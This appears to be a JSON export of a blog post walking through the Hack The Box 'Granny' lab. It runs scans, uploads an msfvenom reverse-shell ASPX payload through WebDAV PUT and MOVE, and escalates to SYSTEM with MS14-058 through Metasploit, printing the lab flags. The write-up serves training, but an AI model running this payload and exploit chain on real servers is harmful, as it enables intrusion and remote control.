{"id":3756,"date":"2020-08-20T23:35:22","date_gmt":"2020-08-20T14:35:22","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3756"},"modified":"2020-08-30T23:32:11","modified_gmt":"2020-08-30T14:32:11","slug":"hack-the-box-granny-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3756","title":{"rendered":"Hack The Box &#8211; Granny &#8211; Walkthrough"},"content":{"rendered":"<h3>An application called FrontPage is running on port 80<\/h3>\n<p><a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-18_221207.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-18_221207-300x251.png\" alt=\"\" width=\"300\" height=\"251\" class=\"alignnone size-medium wp-image-3758\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-18_221207-300x251.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-18_221207-1024x857.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-18_221207-768x643.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-18_221207.png 1033w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# nmap -A -n -F -T5 granny.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-18 13:09 UTC\r\nStats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan\r\nSYN Stealth Scan Timing: About 67.33% done; ETC: 13:09 (0:00:01 remaining)\r\nNmap scan report for granny.htb (10.10.10.15)\r\nHost is up (0.045s latency).\r\nNot shown: 99 filtered ports\r\nPORT   STATE SERVICE VERSION\r\n80\/tcp open  http    Microsoft IIS httpd 6.0\r\n| http-methods:\r\n|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT\r\n|_http-server-header: 
Microsoft-IIS\/6.0\r\n|_http-title: Under Construction\r\n| http-webdav-scan:\r\n|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK\r\n|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n|   Server Date: Tue, 18 Aug 2020 13:15:25 GMT\r\n|   WebDAV type: Unknown\r\n|_  Server Type: Microsoft-IIS\/6.0\r\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\nAggressive OS guesses: HP LaserJet 4250 printer (92%), OSRAM Lightify ZigBee gateway (91%), Microsoft Xbox game console (modified, running XboxMediaCenter) (91%), Denver Electronics AC-5000W MK2 camera (90%), Nintendo Wii game console (89%), SMC SMC8014WG WAP (89%), HP 170X print server or Inkjet 3000 printer (89%), HP PSC 2400-series Photosmart printer (88%), HP ProCurve 2524 switch or 9100c Digital Sender printer (88%), Netgear WGR614v7 wireless broadband router (88%)\r\nNo exact OS matches for host (test conditions non-ideal).\r\nNetwork Distance: 2 hops\r\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\r\n\r\n# nmap -T4 --script vuln 10.10.10.15\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-18 13:10 UTC\r\nNmap scan report for 10.10.10.15\r\nHost is up (0.038s latency).\r\nNot shown: 999 filtered ports\r\nPORT   STATE SERVICE\r\n80\/tcp open  http\r\n|_clamav-exec: ERROR: Script execution failed (use -d to debug)\r\n|_http-csrf: Couldn't find any CSRF vulnerabilities.\r\n|_http-dombased-xss: Couldn't find any DOM based XSS.\r\n| http-enum:\r\n|   \/_vti_bin\/: Frontpage file or folder\r\n|   \/_vti_log\/: Frontpage file or folder\r\n|   \/postinfo.html: Frontpage file or folder\r\n|   \/_vti_bin\/_vti_aut\/author.dll: Frontpage file or folder\r\n|   \/_vti_bin\/_vti_aut\/author.exe: Frontpage file or folder\r\n|   \/_vti_bin\/_vti_adm\/admin.dll: Frontpage file or folder\r\n|   
\/_vti_bin\/_vti_adm\/admin.exe: Frontpage file or folder\r\n|   \/_vti_bin\/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder\r\n|   \/_vti_bin\/shtml.dll: Frontpage file or folder\r\n|   \/_vti_bin\/shtml.exe: Frontpage file or folder\r\n|   \/images\/: Potentially interesting folder\r\n|_  \/_private\/: Potentially interesting folder\r\n| http-frontpage-login:\r\n|   VULNERABLE:\r\n|   Frontpage extension anonymous login\r\n|     State: VULNERABLE\r\n|       Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.\r\n|\r\n|     References:\r\n|_      http:\/\/insecure.org\/sploits\/Microsoft.frontpage.insecurities.html\r\n|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.\r\n<\/pre>\n<h3>WebDAV is enabled and file upload is possible<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# perl nikto.pl -h http:\/\/granny.htb\/\r\n- ***** SSL support not available (see docs for SSL install) *****\r\n- Nikto v2.1.6\r\n---------------------------------------------------------------------------\r\n+ Target IP:          10.10.10.15\r\n+ Target Hostname:    granny.htb\r\n+ Target Port:        80\r\n+ Start Time:         2020-08-18 15:01:46 (GMT0)\r\n---------------------------------------------------------------------------\r\n+ Server: Microsoft-IIS\/6.0\r\n+ Retrieved microsoftofficewebserver header: 5.0_Pub\r\n+ Retrieved x-powered-by header: ASP.NET\r\n+ The anti-clickjacking X-Frame-Options header is not present.\r\n+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS\r\n+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub\r\n+ The X-Content-Type-Options header is not set. 
This could allow the user agent to render the content of the site in a different fashion to the MIME type.\r\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\r\n+ Retrieved dasl header: &lt;DAV:sql&gt;\r\n+ Retrieved dav header: 1, 2\r\n+ Retrieved ms-author-via header: MS-FP\/4.0,DAV\r\n+ Uncommon header 'ms-author-via' found, with contents: MS-FP\/4.0,DAV\r\n+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK\r\n+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.\r\n+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.\r\n+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.\r\n+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.\r\n+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.\r\n+ WebDAV enabled (MKCOL COPY SEARCH PROPFIND LOCK PROPPATCH UNLOCK listed as allowed)\r\n+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http:\/\/granny\/_vti_bin\/_vti_aut\/author.dll\r\n+ OSVDB-396: \/_vti_bin\/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe\/aux.htm -- a DoS was not attempted.\r\n+ OSVDB-3233: \/_vti_bin\/: FrontPage directory found.\r\n+ OSVDB-3300: \/_vti_bin\/: shtml.exe\/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted).\r\n+ OSVDB-3500: \/_vti_bin\/fpcount.exe: Frontpage counter CGI has been found. 
FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-1999-1376. http:\/\/www.securityfocus.com\/bid\/2252.\r\n+ OSVDB-67: \/_vti_bin\/shtml.dll\/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.\r\n+ \/_vti_bin\/_vti_adm\/admin.dll: FrontPage\/SharePoint file found.\r\n+ Retrieved x-aspnet-version header: 1.1.4322\r\n+ 8110 requests: 6 error(s) and 26 item(s) reported on remote host\r\n+ End Time:           2020-08-18 15:41:16 (GMT0) (2370 seconds)\r\n---------------------------------------------------------------------------\r\n+ 1 host(s) tested\r\n\r\n# davtest --url http:\/\/granny.htb\/\r\n********************************************************\r\n Testing DAV connection\r\nOPEN            SUCCEED:                http:\/\/granny.htb\r\n********************************************************\r\nNOTE    Random string for this session: 1qjcRJmh6BgKgoh\r\n********************************************************\r\n Creating directory\r\nMKCOL           SUCCEED:                Created http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\r\n********************************************************\r\n Sending test files\r\nPUT     html    SUCCEED:        http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.html\r\nPUT     php     SUCCEED:        http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.php\r\nPUT     asp     FAIL\r\nPUT     cgi     FAIL\r\nPUT     jsp     SUCCEED:        http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.jsp\r\nPUT     jhtml   SUCCEED:        http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.jhtml\r\nPUT     shtml   FAIL\r\nPUT     txt     SUCCEED:        http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.txt\r\nPUT     aspx    FAIL\r\nPUT     cfm     SUCCEED:        
http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.cfm\r\nPUT     pl      SUCCEED:        http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.pl\r\n********************************************************\r\n Checking for test file execution\r\nEXEC    html    SUCCEED:        http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.html\r\nEXEC    php     FAIL\r\nEXEC    jsp     FAIL\r\nEXEC    jhtml   FAIL\r\nEXEC    txt     SUCCEED:        http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.txt\r\nEXEC    cfm     FAIL\r\nEXEC    pl      FAIL\r\n\r\n********************************************************\r\n\/usr\/bin\/davtest Summary:\r\nCreated: http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\r\nPUT File: http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.html\r\nPUT File: http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.php\r\nPUT File: http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.jsp\r\nPUT File: http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.jhtml\r\nPUT File: http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.txt\r\nPUT File: http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.cfm\r\nPUT File: http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.pl\r\nExecutes: http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.html\r\nExecutes: http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.txt\r\n\r\n# echo &quot;Test&quot; &gt; test.html\r\n\r\n# curl -X PUT http:\/\/granny.htb\/test.html -d @test.html\r\n\r\n# curl http:\/\/granny.htb\/test.html\r\nTest\r\n<\/pre>\n<h3>Upload the exploit code and take a shell<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# msfvenom -a 
x86 --platform Windows -p windows\/meterpreter\/reverse_tcp -f aspx LHOST=10.10.14.21 LPORT=4444 -o shell.aspx\r\n&#x5B;-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\r\n&#x5B;-] No arch selected, selecting arch: x86 from the payload\r\nNo encoder specified, outputting raw payload\r\nPayload size: 324 bytes\r\nFinal size of aspx file: 2716 bytes\r\nSaved as: shell.aspx\r\n\r\n# mv shell.aspx shell.txt\r\n\r\n# curl -X PUT http:\/\/granny.htb\/shell.txt --data-binary @shell.txt\r\n\r\n# curl -X MOVE --header 'Destination:http:\/\/granny.htb\/shell.aspx' 'http:\/\/granny.htb\/shell.txt'\r\n\r\n# msfconsole\r\n\r\nmsf5 &gt; use exploit\/multi\/handler\r\n&#x5B;*] Using configured payload generic\/shell_reverse_tcp\r\n\r\nmsf5 exploit(multi\/handler) &gt; set LHOST 0.0.0.0\r\nLHOST =&gt; 0.0.0.0\r\n\r\nmsf5 exploit(multi\/handler) &gt; exploit\r\n&#x5B;*] Started reverse TCP handler on 0.0.0.0:4444\r\n<\/pre>\n<p>Accessing the site gives us a session. Because the session drops right away, background it immediately.<br \/>\n<a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-20_002528.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-20_002528-300x140.png\" alt=\"\" width=\"300\" height=\"140\" class=\"alignnone size-medium wp-image-3757\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-20_002528-300x140.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-20_002528-1024x477.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-20_002528-768x358.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-20_002528.png 1168w\" sizes=\"(max-width: 
300px) 100vw, 300px\" \/><\/a><\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n&#x5B;*] Command shell session 1 opened (172.17.0.2:4444 -&gt; 172.17.0.1:34020) at 2020-08-20 14:04:59 +0000\r\n\r\nbackground\r\n\r\nBackground session 1? &#x5B;y\/N]  y\r\n\r\nmsf5 exploit(multi\/handler) &gt; sessions\r\n\r\nActive sessions\r\n===============\r\n\r\n  Id  Name  Type             Information  Connection\r\n  --  ----  ----             -----------  ----------\r\n  1         shell sparc\/bsd               172.17.0.2:4444 -&gt; 172.17.0.1:34058 (172.17.0.1)\r\n\r\n<\/pre>\n<p>In other writeups the Type was Windows, but for some reason here it was sparc\/bsd. This caused me quite a bit of trouble.<\/p>\n<h3>Finding vulnerabilities from sysinfo<\/h3>\n<p>The part where the sysinfo data is collected is omitted.<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo \/home\/shimizu\/granny\/systeminfo.txt --quiet\r\n&#x5B;*] initiating winsploit version 3.3...\r\n&#x5B;*] database file detected as xls or xlsx based on extension\r\n&#x5B;*] attempting to read from the systeminfo input file\r\n&#x5B;+] systeminfo input file read successfully (ascii)\r\n&#x5B;*] querying database file for potential vulnerabilities\r\n&#x5B;*] comparing the 1 hotfix(es) against the 356 potential bulletins(s) with a database of 137 known exploits\r\n&#x5B;*] there are now 356 remaining vulns\r\n&#x5B;+] &#x5B;E] exploitdb PoC, &#x5B;M] Metasploit module, &#x5B;*] missing bulletin\r\n&#x5B;+] windows version identified as 'Windows 2003 SP2 32-bit'\r\n&#x5B;*]\r\n&#x5B;M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important\r\n&#x5B;E] MS15-010: Vulnerabilities in 
Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical\r\n&#x5B;E] MS14-070: Vulnerability in TCP\/IP Could Allow Elevation of Privilege (2989935) - Important\r\n&#x5B;E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical\r\n&#x5B;M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical\r\n&#x5B;M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important\r\n&#x5B;M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical\r\n&#x5B;E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important\r\n&#x5B;E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical\r\n&#x5B;E] MS14-029: Security Update for Internet Explorer (2962482) - Critical\r\n&#x5B;E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important\r\n&#x5B;M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical\r\n&#x5B;M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important\r\n&#x5B;E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important\r\n&#x5B;E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important\r\n&#x5B;M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical\r\n&#x5B;M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical\r\n&#x5B;M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical\r\n&#x5B;M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important\r\n&#x5B;M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical\r\n&#x5B;M] MS13-059: 
Cumulative Security Update for Internet Explorer (2862772) - Critical\r\n&#x5B;M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical\r\n&#x5B;M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical\r\n&#x5B;M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical\r\n&#x5B;E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical\r\n&#x5B;M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important\r\n&#x5B;E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important\r\n&#x5B;M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important\r\n&#x5B;M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical\r\n&#x5B;M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important\r\n&#x5B;M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical\r\n&#x5B;M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical\r\n&#x5B;M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) x- Critical\r\n&#x5B;M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important\r\n&#x5B;M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important\r\n&#x5B;M] MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important\r\n&#x5B;M] MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical\r\n&#x5B;M] MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical\r\n&#x5B;M] MS08-078: Security Update for 
Internet Explorer (960714) - Critical\r\n&#x5B;*] done\r\n<\/pre>\n<h3>Obtain administrator privileges via MS14-058<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nmsf5 exploit(multi\/handler) &gt; use windows\/local\/ms14_058_track_popup_menu\r\n&#x5B;*] No payload configured, defaulting to windows\/meterpreter\/reverse_tcp\r\nmsf5 exploit(windows\/local\/ms14_058_track_popup_menu) &gt; set SESSION 1\r\nSESSION =&gt; 1\r\nmsf5 exploit(windows\/local\/ms14_058_track_popup_menu) &gt; set LHOST 10.10.14.21\r\nLHOST =&gt; 10.10.14.21\r\nmsf5 exploit(windows\/local\/ms14_058_track_popup_menu) &gt; exploit\r\n\r\n&#x5B;!] SESSION may not be compatible with this module.\r\n&#x5B;-] Handler failed to bind to 10.10.14.21:4444:-  -\r\n&#x5B;*] Started reverse TCP handler on 0.0.0.0:4444\r\n&#x5B;*] 172.17.0.1 - Command shell session 1 closed.\r\n&#x5B;*] Sending stage (176195 bytes) to 172.17.0.1\r\n&#x5B;*] Meterpreter session 2 opened (172.17.0.2:4444 -&gt; 172.17.0.1:34062) at 2020-08-20 14:23:31 +0000\r\n&#x5B;-] Exploit aborted due to failure: none: Session is already elevated\r\n&#x5B;*] Exploit completed, but no session was created.\r\nmsf5 exploit(windows\/local\/ms14_058_track_popup_menu) &gt; sessions\r\n\r\nActive sessions\r\n===============\r\n\r\n  Id  Name  Type                     Information                            Connection\r\n  --  ----  ----                     -----------                            ----------\r\n  2         meterpreter x86\/windows  NT AUTHORITY\\NETWORK SERVICE @ GRANNY  172.17.0.2:4444 -&gt; 172.17.0.1:34062 (10.10.10.15)\r\n\r\nmsf5 exploit(windows\/local\/ms14_058_track_popup_menu) &gt; set SESSION 2\r\nSESSION =&gt; 2\r\nmsf5 exploit(windows\/local\/ms14_058_track_popup_menu) &gt; exploit\r\n\r\n&#x5B;-] Handler failed to bind to 10.10.14.21:4444:-  -\r\n&#x5B;*] Started reverse TCP handler on 0.0.0.0:4444\r\n&#x5B;*] Launching notepad to host the exploit...\r\n&#x5B;+] 
Process 3620 launched.\r\n&#x5B;*] Reflectively injecting the exploit DLL into 3620...\r\n&#x5B;*] Injecting exploit into 3620...\r\n&#x5B;*] Exploit injected. Injecting payload into 3620...\r\n&#x5B;*] Payload injected. Executing exploit...\r\n&#x5B;+] Exploit finished, wait for (hopefully privileged) payload execution to complete.\r\n&#x5B;*] Sending stage (176195 bytes) to 172.17.0.1\r\n&#x5B;*] Meterpreter session 3 opened (172.17.0.2:4444 -&gt; 172.17.0.1:34066) at 2020-08-20 14:24:25 +0000\r\n\r\nmeterpreter &gt; getuid\r\nServer username: NT AUTHORITY\\SYSTEM\r\n\r\nmeterpreter &gt; shell\r\nProcess 2128 created.\r\nChannel 2 created.\r\nMicrosoft Windows &#x5B;Version 5.2.3790]\r\n(C) Copyright 1985-2003 Microsoft Corp.\r\n\r\nc:\\windows\\system32\\inetsrv&gt;cd C:\\Documents and Settings\\Lakis\\Desktop\r\ncd C:\\Documents and Settings\\Lakis\\Desktop\\\r\n\r\nC:\\Documents and Settings\\Lakis\\Desktop&gt;type user.txt\r\ntype user.txt\r\n700c5dc163014e22b3e408f8703f67d1\r\n\r\nC:\\Documents and Settings\\Lakis\\Desktop&gt;cd C:\\Documents and Settings\\Administrator\\Desktop\r\ncd C:\\Documents and Settings\\Administrator\\Desktop\r\n\r\nC:\\Documents and Settings\\Administrator\\Desktop&gt;type root.txt\r\ntype root.txt\r\naa4beed1c0584445ab463a6747bd06e9\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>An application called FrontPage is running on port 80 # nmap -A -n -F -T5 granny.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3756"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3756"}],"version-history":[{"count":3,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3756\/revisions"}],"predecessor-version":[{"id":3780,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3756\/revisions\/3780"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3756"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3756"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3756"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}